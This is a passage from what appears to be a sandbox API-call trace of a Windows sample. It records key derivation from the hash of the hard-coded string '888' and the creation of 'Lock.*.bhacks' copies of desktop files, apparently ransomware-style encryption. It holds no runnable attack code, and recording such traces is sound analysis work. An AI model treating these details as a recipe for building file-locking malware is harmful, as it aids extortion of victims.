[0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.134] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.135] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.135] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0102.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.135] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0102.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.135] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0102.135] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.135] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0102.135] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.135] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.135] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0102.135] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.136] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0102.136] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.136] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9f10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0102.136] CryptCreateHash (in: hProv=0x9be890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0102.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.136] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0102.137] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.137] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0102.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9cd0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0102.137] CryptHashData (hHash=0x9a3b80, pbData=0x2a71b68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.137] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.137] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.137] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.138] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0102.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.138] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0102.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0102.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0102.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0102.138] CryptDeriveKey (in: hProv=0x9be890, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4780) returned 1 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.138] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0102.138] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0102.138] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0102.138] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0102.138] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0102.138] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f71e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0102.139] CryptDestroyHash (hHash=0x9a3b80) returned 1 [0102.139] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.139] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\kz5g.mp4.bhacks"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0102.140] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.140] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0102.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0102.140] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0102.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75ba0 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0102.141] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75ba0 | out: hHeap=0x2af0000) returned 1 [0102.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2abe880 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0102.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.141] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.Kz5g.mp4.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.kz5g.mp4.bhacks"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 